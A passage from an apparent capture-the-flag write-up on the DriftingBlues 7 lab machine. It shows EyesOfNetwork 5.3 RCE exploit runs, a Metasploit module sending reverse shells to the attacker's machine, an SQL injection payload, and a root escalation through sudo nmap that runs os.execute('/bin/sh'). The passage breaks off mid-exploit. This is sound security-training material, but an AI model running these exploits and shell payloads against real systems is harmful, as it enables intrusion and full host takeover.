\n.\/listen.sh: 1: gnome-terminal: not found\nSending PostRequest ...\n.\/req.sh: 2: Syntax error: Unterminated quoted string\nGet request on the PHP payload ...\nclearing cache<\/code><\/pre>\n<p>Uh, this one doesn't work, so let's try another:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 48025.txt http:\/\/172.20.10.4 -ip 172.20.10.8 -port 1234\n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.3 RCE (API v2.4.2)                                          |\n| 02\/2020 - Cl\u00e9ment Billac Twitter: @h4knet                                  |\n+-----------------------------------------------------------------------------+\n\nTraceback (most recent call last):\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connection.py&quot;, line 174, in _new_conn\n    conn = connection.create_connection(\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/util\/connection.py&quot;, line 96, in create_connection\n    raise err\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/util\/connection.py&quot;, line 86, in create_connection\n    sock.connect(sa)\nOSError: [Errno 113] No route to host\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connectionpool.py&quot;, line 716, in urlopen\n    httplib_response = self._make_request(\n                       ^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connectionpool.py&quot;, line 417, in _make_request\n    conn.request(method, url, **httplib_request_kw)\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connection.py&quot;, line 244, in request\n    super(HTTPConnection, self).request(method, url, body=body, headers=headers)\n  File 
&quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 1298, in request\n    self._send_request(method, url, body, headers, encode_chunked)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 1344, in _send_request\n    self.endheaders(body, encode_chunked=encode_chunked)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 1293, in endheaders\n    self._send_output(message_body, encode_chunked=encode_chunked)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 1052, in _send_output\n    self.send(msg)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 990, in send\n    self.connect()\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connection.py&quot;, line 205, in connect\n    conn = self._new_conn()\n           ^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connection.py&quot;, line 186, in _new_conn\n    raise NewConnectionError(\nurllib3.exceptions.NewConnectionError: &lt;urllib3.connection.HTTPConnection object at 0x7f3a33cd8350&gt;: Failed to establish a new connection: [Errno 113] No route to host\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/adapters.py&quot;, line 486, in send\n    resp = conn.urlopen(\n           ^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connectionpool.py&quot;, line 800, in urlopen\n    retries = retries.increment(\n              ^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/util\/retry.py&quot;, line 592, in increment\n    raise MaxRetryError(_pool, url, error or ResponseError(cause))\nurllib3.exceptions.MaxRetryError: HTTPConnectionPool(host=&#039;172.20.10.4&#039;, port=80): Max retries exceeded with url: \/ (Caused by NewConnectionError(&#039;&lt;urllib3.connection.HTTPConnection object at 0x7f3a33cd8350&gt;: Failed to establish a new connection: [Errno 
113] No route to host&#039;))\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File &quot;\/home\/kali\/temp\/driftingblues7\/48025.txt&quot;, line 89, in &lt;module&gt;\n    r = requests.get(baseurl, verify=False, headers={&#039;user-agent&#039;:useragent})\n        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/api.py&quot;, line 73, in get\n    return request(&quot;get&quot;, url, params=params, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/api.py&quot;, line 59, in request\n    return session.request(method=method, url=url, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/sessions.py&quot;, line 589, in request\n    resp = self.send(prep, **send_kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/sessions.py&quot;, line 703, in send\n    r = adapter.send(request, **kwargs)\n        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/adapters.py&quot;, line 519, in send\n    raise ConnectionError(e, request=request)\nrequests.exceptions.ConnectionError: HTTPConnectionPool(host=&#039;172.20.10.4&#039;, port=80): Max retries exceeded with url: \/ (Caused by NewConnectionError(&#039;&lt;urllib3.connection.HTTPConnection object at 0x7f3a33cd8350&gt;: Failed to establish a new connection: [Errno 113] No route to host&#039;))<\/code><\/pre>\n<p>This one doesn't work either, so let's try yet another:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810227.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810227.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412172248055\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Give it a try:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810228.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810228.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173034823\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810229.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810229.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173044617\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>And then the shell connected back:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810230.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810230.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173105370\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try escalating privileges the way the payload suggests:<\/p>\n<pre><code class=\"language-bash\">(remote) apache@driftingblues.localdomain:\/srv\/eyesofnetwork\/lilac\/autodiscovery$ echo &#039;os.execute(&quot;\/bin\/sh&quot;)&#039; &gt; \/tmp\/nmap.script\n(remote) apache@driftingblues.localdomain:\/srv\/eyesofnetwork\/lilac\/autodiscovery$ sudo nmap --script=\/tmp\/nmap.script\n\nStarting Nmap 6.40 ( http:\/\/nmap.org ) at 2024-04-12 05:31 EDT\nNSE: Warning: Loading &#039;\/tmp\/nmap.script&#039; -- the recommended file extension is &#039;.nse&#039;.\nsh-4.2# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nsh-4.2# find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/usr\/libexec\/dbus-1\/dbus-daemon-launch-helper\n\/usr\/bin\/newgrp\n\/usr\/bin\/chage\n\/usr\/bin\/sudo\n\/usr\/bin\/umount\n\/usr\/bin\/pkexec\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/crontab\n\/usr\/bin\/passwd\n\/usr\/bin\/fusermount\n\/usr\/bin\/mount\n\/usr\/bin\/chsh\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\n\/usr\/sbin\/unix_chkpwd\n\/usr\/sbin\/usernetctl\n\/usr\/sbin\/pam_timestamp_check\nsh-4.2# sudo -l\nMatching Defaults entries for root on driftingblues:\n    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep=&quot;COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR\n    LS_COLORS&quot;, env_keep+=&quot;MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE&quot;, env_keep+=&quot;LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES&quot;,\n    env_keep+=&quot;LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE&quot;, env_keep+=&quot;LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY&quot;,\n    secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\n\nUser root may run the following commands on driftingblues:\n    (ALL) ALL\nsh-4.2# cd root\nsh: cd: root: No such file or directory\nsh-4.2# cd \/root\nsh-4.2# ls -la\ntotal 80\ndr-xr-x---.  4 root root  4096 Apr  3  2021 .\ndr-xr-xr-x. 19 root root  4096 Apr  3  2021 ..\n-rw-------.  1 root root   774 Apr  3  2021 .bash_history\n-rw-r--r--.  1 root root    18 Dec 28  2013 .bash_logout\n-rw-r--r--.  1 root root   176 Dec 28  2013 .bash_profile\n-rw-r--r--.  1 root root   176 Dec 28  2013 .bashrc\n-rw-r--r--.  1 root root   100 Dec 28  2013 .cshrc\ndrwxr-----.  3 root root  4096 Apr  3  2021 .pki\n-rw-r--r--.  1 root root   129 Dec 28  2013 .tcshrc\n-rw-------.  1 root root  1401 Apr  3  2021 anaconda-ks.cfg\n-rwxr-xr-x.  1 root root   248 Apr  3  2021 eon\n-rw-r--r--   1 root root 17477 Apr  7  2021 index.htm\ndrwxr-xr-x.  
2 root root  4096 Apr  3  2021 index_files\n-rw-r--r--   1 root root    32 Apr  7  2021 root.txt\n-rwxr-xr-x.  1 root root    52 Apr  3  2021 upit.sh\n-rw-r--r--   1 root root    32 Apr  7  2021 user.txt\nsh-4.2# cat root.txt \nBD221F968ACB7E069FC7DDE713995C77sh-4.2# cat user.txt \nAED508ABE3D1D1303E1C1BC5F1C1BA2Bsh-4.2# cat upit.sh \n#!\/bin\/bash\n\ncd \/root\npython -m SimpleHTTPServer 66\nsh-4.2# exit\nexit\nNSE: failed to initialize the script engine:\n\/usr\/bin\/..\/share\/nmap\/nse_main.lua:554: \/tmp\/nmap.script is missing required field: &#039;action&#039;\nstack traceback:\n        [C]: in function &#039;error&#039;\n        \/usr\/bin\/..\/share\/nmap\/nse_main.lua:554: in function &#039;new&#039;\n        \/usr\/bin\/..\/share\/nmap\/nse_main.lua:783: in function &#039;get_chosen_scripts&#039;\n        \/usr\/bin\/..\/share\/nmap\/nse_main.lua:1271: in main chunk\n        [C]: in ?\n\nQUITTING!\n(remote) apache@driftingblues.localdomain:\/srv\/eyesofnetwork\/lilac\/autodiscovery$ sudo -l\nMatching Defaults entries for apache on driftingblues:\n    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep=&quot;COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR\n    LS_COLORS&quot;, env_keep+=&quot;MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE&quot;, env_keep+=&quot;LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES&quot;,\n    env_keep+=&quot;LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE&quot;, env_keep+=&quot;LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY&quot;,\n    secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\n\nUser apache may run the following commands on driftingblues:\n    (root) NOPASSWD: \/bin\/systemctl * snmptt, \/bin\/systemctl * snmptrapd, \/bin\/systemctl * snmpd, \/bin\/systemctl * nagios, \/bin\/systemctl * gedd,\n        
\/usr\/bin\/nmap<\/code><\/pre>\n<p>So the box ships with a suid nmap. Compare the date of the vulnerability with the date of the target machine:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810231.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810231.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173424609\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810232.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810232.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173453912\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Bad news, this vulnerability was only discovered later. Try googling for related vulnerabilities:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810233.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810233.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173751336\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810234.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810234.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173829620\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>This one does fit the timeline, so download it and see whether it works. It throws the same error as above, so look at another one:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810235.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810235.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412174429903\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>This one fits too, so try it. It kept throwing errors, and only then did I notice that I had entered the wrong target IP. Retry all of them.<\/p>\n<p>Luckily, what did not work before still does not work now:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 eonrce.py -h                                                                               \nusage: \n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.3 RCE                                                       |\n| 03\/2020 - v1.1 - Cl\u00e9ment Billac Twitter: @h4knet                            |\n|                                                                             |\n| Examples:                                                                   |\n| eonrce.py -h                                                                |\n| eonrce.py http(s):\/\/EyesOfNetwork-URL                                       |\n| eonrce.py https:\/\/eon.thinc.local -ip 10.11.0.182 -port 3128                |\n| eonrce.py https:\/\/eon.thinc.local -ip 10.11.0.182 -user pentest2020         |\n+-----------------------------------------------------------------------------+\npositional arguments:\n  URL             
    URL of the EyesOfNetwork server\n\noptions:\n  -h, --help          show this help message and exit\n  -ip IP              Local IP to receive reverse shell\n  -port Port          Local port to listen\n  -user Username      Name of the new user to create\n  -password Password  Password of the new user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 eonrce.py http:\/\/172.20.10.6 -ip 172.20.10.8 -port 1234 -user admin -password isitreal31__\n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.3 RCE                                                       |\n| 03\/2020 - v1.1 - Cl\u00e9ment Billac - Twitter: @h4knet                          |\n+-----------------------------------------------------------------------------+\n[*] Reverse shell: 172.20.10.8:1234\n[*] User to create: admin:isitreal31__\n[*] EyesOfNetwork login page found\n[*] EyesOfNetwork API page found. API version: 2.4.2\n[x] The host seems patched or unexploitable\n[!] Did you specified http instead of https in the URL ?\n[!] 
You can check manually the SQLi with the following payload: \/eonapi\/getApiKey?username=&#039; union select sleep(3),0,0,0,0,0,0,0 or &#039;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 eonrce2.py -h                                                                             \nusage: \n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.1 to 5.3 RCE exploit                                        |\n| 03\/2020 - v1.0 - Cl\u00e9ment Billac - Twitter: @h4knet                          |\n|                                                                             |\n| Examples:                                                                   |\n| eonrce.py -h                                                                |\n| eonrce.py http(s):\/\/EyesOfNetwork-URL                                       |\n| eonrce.py https:\/\/eon.thinc.local -ip 10.11.0.182 -port 3128                |\n+-----------------------------------------------------------------------------+\npositional arguments:\n  URL           URL of the EyesOfNetwork server\n\noptions:\n  -h, --help    show this help message and exit\n  -ip IP        Local IP to receive reverse shell\n  -port Port    Local port to listen\n  -sleep Sleep  SQL Sleep value\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 eonrce2.py http:\/\/172.20.10.6 -ip 172.20.10.8 -port 1234\n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.1 to 5.3 RCE exploit                                        |\n| 03\/2020 - v1.0 - Cl\u00e9ment Billac - Twitter: @h4knet                        |\n+-----------------------------------------------------------------------------+\n\n[*] EyesOfNetwork login page found\n[+] Application seems vulnerable. 
Time: 1.006418\n[*] The admin user has at least one session opened\n[*] Found the admin session_id size: 29\n[+] Obtained admin session ID: 358748692\n[x] Error while creating the discovery job<\/code><\/pre>\n<p>I do not know what is going on. Some people got in with this script, but I did not succeed. Try the msf module, whose date also matches!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ msfconsole\nMetasploit tip: Use the resource command to run commands from a file\n\n               .;lxO0KXXXK0Oxl:.\n           ,o0WMMMMMMMMMMMMMMMMMMKd,\n        &#039;xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,\n      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:\n    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,\n   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo\n  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk\n oMMMMMMMMMMx.                    dMMMMMMMMMMx\n.WMMMMMMMMM:                       :MMMMMMMMMM,\nxMMMMMMMMMo                         lMMMMMMMMMO\nNMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;\nMMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:\nNMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:\nxMMMMMMMMMd                        ,0MMMMMMMMMMK;\n.WMMMMMMMMMc                         &#039;OMMMMMM0,\n lMMMMMMMMMMk.                         .kMMO&#039;\n  dMMMMMMMMMMWd&#039;                         ..\n   cWMMMMMMMMMMMNxc&#039;.                ##########\n    .0MMMMMMMMMMMMMMMMWc            #+#    #+#\n      ;0MMMMMMMMMMMMMMMo.          
+:+\n        .dNMMMMMMMMMMMMo          +#++:++#+\n           &#039;oOWMMMMMMMMo                +:+\n               .,cdkO0K;        :+:    :+:                                \n                                :::::::+:\n                      Metasploit\n\n       =[ metasploit v6.3.55-dev                          ]\n+ -- --=[ 2397 exploits - 1235 auxiliary - 422 post       ]\n+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]\n+ -- --=[ 9 evasion                                       ]\n\nMetasploit Documentation: https:\/\/docs.metasploit.com\/\n\nmsf6 &gt; search eyesofnetwork\n\nMatching Modules\n================\n\n   #  Name                                                Disclosure Date  Rank       Check  Description\n   -  ----                                                ---------------  ----       -----  -----------\n   0  exploit\/linux\/http\/eyesofnetwork_autodiscovery_rce  2020-02-06       excellent  Yes    EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution\n\nInteract with a module by name or index. 
For example info 0, use 0 or use exploit\/linux\/http\/eyesofnetwork_autodiscovery_rce\n\nmsf6 &gt; use 0\n[*] Using configured payload linux\/x64\/meterpreter\/reverse_tcp\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; show options;\n[-] Invalid parameter &quot;options;&quot;, use &quot;show -h&quot; for more information\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; show options\n\nModule options (exploit\/linux\/http\/eyesofnetwork_autodiscovery_rce):\n\n   Name         Current Setting  Required  Description\n   ----         ---------------  --------  -----------\n   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS                        yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT        443              yes       The target port (TCP)\n   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)\n   SSL          true             no        Negotiate SSL\/TLS for outgoing connections\n   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)\n   TARGETURI    \/                yes       Base path to EyesOfNetwork\n   URIPATH                       no        The URI to use for this exploit (default is random)\n   VHOST                         no        HTTP server virtual host\n\n   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. 
This must be an address on the local machine or 0.0.0.0 to li\n                                       sten on all addresses.\n   SRVPORT  8080             yes       The local port to listen on.\n\nPayload options (linux\/x64\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST                   yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   1   Linux (x64)\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; set rhosts 172.20.10.6\nrhosts =&gt; 172.20.10.6\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; set lhost 172.20.10.8\nlhost =&gt; 172.20.10.8\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; exploit\n\n[*] Started reverse TCP handler on 172.20.10.8:4444 \n[*] Running automatic check (&quot;set AutoCheck false&quot; to disable)\n[+] The target appears to be vulnerable. Target is EyesOfNetwork 5.3 or older with API version 2.4.2.\n[*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656.\n[*] Using generated API key: 593ab303a223a1a885c6f4be0e1eeb46145a248144a8d0318f315ba6d1d85c26\n[-] Generated API key does not match.\n[*] Using API key obtained via SQL injection: 593ab303a223a1a885c6f4be0e1eeb46145a248144a8d0318f315ba6d1d85c26\n[-] Failed to obtain valid API key.\n[*] Attempting exploitation using CVE-2020-9465.\n[+] The target seems vulnerable.\n[*] Verified that the admin user 